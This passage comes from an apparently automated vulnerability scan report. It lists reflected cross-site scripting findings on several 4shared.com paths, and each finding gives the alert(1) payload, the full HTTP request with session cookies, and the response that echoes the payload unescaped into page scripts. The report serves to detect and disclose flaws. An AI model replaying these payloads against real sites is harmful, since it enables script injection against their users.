The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 531c3'-alert(1)-'64d46690de1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /531c3'-alert(1)-'64d46690de1/BBQD/1/music HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /531c3'-alert(1)-'64d46690de1/BBQD/1/music
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E8E38637F4650B01A6BDCB5D261CA26F.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:51 GMT
Connection: close
Content-Length: 36128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...

if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/531c3'-alert(1)-'64d46690de1/BBQD/1/music',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

1.328. http://www.4shared.com/q/BBQD/1/music [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/q/BBQD/1/music

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0d14"-alert(1)-"821bdd307fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d0d14"-alert(1)-"821bdd307fa/BBQD/1/music HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /d0d14"-alert(1)-"821bdd307fa/BBQD/1/music
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BBA5D99DE20ED5B76ABAEA41857ABC88.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:50 GMT
Connection: close
Content-Length: 36128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/d0d14"-alert(1)-"821bdd307fa/BBQD/1/music";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.329. http://www.4shared.com/q/BBQD/1/photo [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/q/BBQD/1/photo

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ee0e'-alert(1)-'390ad8eab51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /5ee0e'-alert(1)-'390ad8eab51/BBQD/1/photo HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /5ee0e'-alert(1)-'390ad8eab51/BBQD/1/photo
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7E0E260E9012A9F20014897005AB8259.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:59 GMT
Connection: close
Content-Length: 36117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...

if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/5ee0e'-alert(1)-'390ad8eab51/BBQD/1/photo',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

1.330. http://www.4shared.com/q/BBQD/1/photo [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/q/BBQD/1/photo

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6737"-alert(1)-"b10306e2af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c6737"-alert(1)-"b10306e2af/BBQD/1/photo HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /c6737"-alert(1)-"b10306e2af/BBQD/1/photo
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=46767249EFBF094A5A5310B7A919D858.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:58 GMT
Connection: close
Content-Length: 36123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/c6737"-alert(1)-"b10306e2af/BBQD/1/photo";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.331. http://www.4shared.com/q/BBQD/1/video [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/q/BBQD/1/video

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82467"-alert(1)-"f15a819900 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /82467"-alert(1)-"f15a819900/BBQD/1/video HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /82467"-alert(1)-"f15a819900/BBQD/1/video
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E3054CC4BE274D5119832B17CA3C7098.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:50 GMT
Connection: close
Content-Length: 36123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/82467"-alert(1)-"f15a819900/BBQD/1/video";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.332. http://www.4shared.com/q/BBQD/1/video [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/q/BBQD/1/video

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc5bf'-alert(1)-'84977d6d763 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fc5bf'-alert(1)-'84977d6d763/BBQD/1/video HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /fc5bf'-alert(1)-'84977d6d763/BBQD/1/video
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0F6232D21556759D4A745B8396B2F343.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:51 GMT
Connection: close
Content-Length: 36128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...

if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/fc5bf'-alert(1)-'84977d6d763/BBQD/1/video',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

1.333. http://www.4shared.com/remindPassword.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/remindPassword.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aea29"-alert(1)-"e20dd6bf12d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /remindPassword.jspaea29"-alert(1)-"e20dd6bf12d HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /remindPassword.jspaea29"-alert(1)-"e20dd6bf12d
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F86B22F249A1DEB5A6AA13BACE0EB958.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:45 GMT
Connection: close
Content-Length: 36153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/remindPassword.jspaea29"-alert(1)-"e20dd6bf12d";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.334. http://www.4shared.com/remindPassword.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/remindPassword.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b905e'-alert(1)-'40af52a6f90 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /remindPassword.jspb905e'-alert(1)-'40af52a6f90 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /remindPassword.jspb905e'-alert(1)-'40af52a6f90
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=741A76766994D185CA4EC2F268E7D977.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:46 GMT
Connection: close
Content-Length: 36142

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
inBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/remindPassword.jspb905e'-alert(1)-'40af52a6f90',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.335. http://www.4shared.com/resellers.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/resellers.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b542e'-alert(1)-'5698ca54492 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resellers.jspb542e'-alert(1)-'5698ca54492 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /resellers.jspb542e'-alert(1)-'5698ca54492
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C7AC573FEED02EE8E4281DD33FAA8FD9.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:11:17 GMT
Connection: close
Content-Length: 36128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
f loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/resellers.jspb542e'-alert(1)-'5698ca54492',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.336. http://www.4shared.com/resellers.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/resellers.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e60e"-alert(1)-"3e718867f77 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resellers.jsp4e60e"-alert(1)-"3e718867f77 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /resellers.jsp4e60e"-alert(1)-"3e718867f77
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=51C5BC92D32BA50426A1498130D29879.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:11:16 GMT
Connection: close
Content-Length: 36117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/resellers.jsp4e60e"-alert(1)-"3e718867f77";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.337. http://www.4shared.com/servlet/ProgressStatus [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/servlet/ProgressStatus

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbe67"-alert(1)-"1a6337f7227 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servletcbe67"-alert(1)-"1a6337f7227/ProgressStatus HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /servletcbe67"-alert(1)-"1a6337f7227/ProgressStatus
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F6F91A68B3F0560ECAE18DB77F405D5E.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:03 GMT
Connection: close
Content-Length: 36173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/servletcbe67"-alert(1)-"1a6337f7227/ProgressStatus";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
...[SNIP]...

1.338. http://www.4shared.com/servlet/ProgressStatus [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/servlet/ProgressStatus

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51082'-alert(1)-'e5332d88eef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet51082'-alert(1)-'e5332d88eef/ProgressStatus HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /servlet51082'-alert(1)-'e5332d88eef/ProgressStatus
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=AB689B3FCA7A419A79A035B72FDD4D56.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:04 GMT
Connection: close
Content-Length: 36173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/servlet51082'-alert(1)-'e5332d88eef/ProgressStatus',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

1.339. http://www.4shared.com/servlet/ProgressStatus [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/servlet/ProgressStatus

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f58a'-alert(1)-'fc1f97d341c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ProgressStatus7f58a'-alert(1)-'fc1f97d341c HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

